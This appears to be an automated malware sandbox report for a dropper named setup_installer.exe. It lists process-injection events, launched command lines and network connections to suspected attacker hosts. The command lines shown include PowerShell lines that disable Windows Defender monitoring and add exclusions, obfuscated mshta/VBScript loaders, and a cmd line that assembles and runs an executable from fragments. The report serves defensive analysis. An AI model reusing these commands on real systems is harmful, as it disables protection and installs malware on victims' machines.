PID 4712 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\System32\Conhost.exe
PID 4712 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\System32\Conhost.exe
PID 4712 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Windows\System32\Conhost.exe
PID 4712 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4712 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4712 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4500 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe
PID 4500 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4712 -ip 4712

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe

Tue19cd42a7c874e44.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe

Tue19b4b38a7569a9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe

Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe

Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe

Tue19cef5687a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe

Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe

Tue19c9e031f4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe

Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe

Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe

Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe

Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe

Tue196397c0f84f8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe

Tue192c34b1c2f5.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe

Tue19c28f648204dbd4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe

Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp" /SL5="$C0068,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 620

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp" /SL5="$20230,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4088 -ip 4088

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 360

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue1932df4dae.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffd772cc40,0x7fffd772cc4c,0x7fffd772cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2200,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3712,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4948 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5028,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3748,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2856 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3468,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3804 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2128,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3908,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2100 /prefetch:2

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3552,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3480 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 propanla.com udp
NL 194.104.136.5:46013 tcp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.16.227:80 c.pki.goog tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegatt.top udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 gcl-gb.biz udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
N/A 127.0.0.1:54599 tcp
N/A 127.0.0.1:54603 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 142.250.179.234:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com tcp
GB 142.250.179.234:443 ogads-pa.googleapis.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.213.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 telegka.top udp
FR 51.178.186.149:80 tcp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 1.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 183.223.178.107.in-addr.arpa udp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 82.190.18.2.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 107.178.223.183:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.155.138.21:80 telegka.top tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 telegin.top udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 telegin.top udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 telegin.top udp
